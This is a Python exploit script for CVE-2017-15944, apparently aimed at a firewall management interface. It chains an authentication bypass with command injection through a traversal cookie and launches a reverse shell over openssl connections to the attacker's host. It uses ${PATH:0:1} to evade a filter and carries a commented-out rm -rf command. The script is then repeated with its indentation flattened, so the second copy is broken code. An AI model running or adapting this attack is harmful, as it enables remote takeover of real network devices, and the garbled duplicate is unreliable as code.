milo2012/CVE-2017-15944_2.py

## CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../.."+path+"/$("+command+").core ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post
def exploit(target, port, localip, lport1, lport2):
    step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
    step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
    commandList=[]
    commandList.append("openssl s_client -quiet -connect "+localip+":"+lport1+" | /bin/bash | openssl s_client -quiet -connect "+localip+":"+lport2)
    #commandList.append("rm -rf "+path+"/*")
    try:
    	if session.get(step2_url, verify=False).status_code == 200:
    		print(step3_url)
    		for command in commandList:
    			print(command)
    			command = command.replace("/","${PATH:0:1}")
    			exp_post = step3_exp(command)
    			rce = session.post(step3_url, data=exp_post, verify=False).json()
    			print(rce)
    			if rce['result']['@status'] == 'success':
    				print('[+] Success, please wait ... ')
    				print('[+] JobID: {}'.format(rce['result']['result']['job']))
    			else:
    				exit('[!] Fail')
    	else:
    		exit('[!] Bypass fail')
    except Exception as err:
    	print(err)
if __name__ == '__main__':
    if len(sys.argv) <= 6:
        exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
    else:
        exit('[+] Usage: python CVE_2017_15944.py IP RPORT LOCALIP LPORT1 LPORT2')
	#!/usr/bin/env python
	# encoding: utf-8
	import requests
	import sys
	import base64
	import time
	requests.packages.urllib3.disable_warnings()
	session = requests.Session()
	path = "/opt/var.cp/cores"
	def step3_exp(command):
	exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../.."+path+"/$("+command+").core ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
	return exp_post
	def exploit(target, port, localip, lport1, lport2):
	step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user\|s."1337";'.format(target, port)
	step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
	commandList=[]
	commandList.append("openssl s_client -quiet -connect "+localip+":"+lport1+" \| /bin/bash \| openssl s_client -quiet -connect "+localip+":"+lport2)
	#commandList.append("rm -rf "+path+"/*")
	try:
	if session.get(step2_url, verify=False).status_code == 200:
	print(step3_url)
	for command in commandList:
	print(command)
	command = command.replace("/","${PATH:0:1}")
	exp_post = step3_exp(command)
	rce = session.post(step3_url, data=exp_post, verify=False).json()
	print(rce)
	if rce['result']['@status'] == 'success':
	print('[+] Success, please wait ... ')
	print('[+] JobID: {}'.format(rce['result']['result']['job']))
	else:
	exit('[!] Fail')
	else:
	exit('[!] Bypass fail')
	except Exception as err:
	print(err)
	if __name__ == '__main__':
	if len(sys.argv) <= 6:
	exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
	else:
	exit('[+] Usage: python CVE_2017_15944.py IP RPORT LOCALIP LPORT1 LPORT2')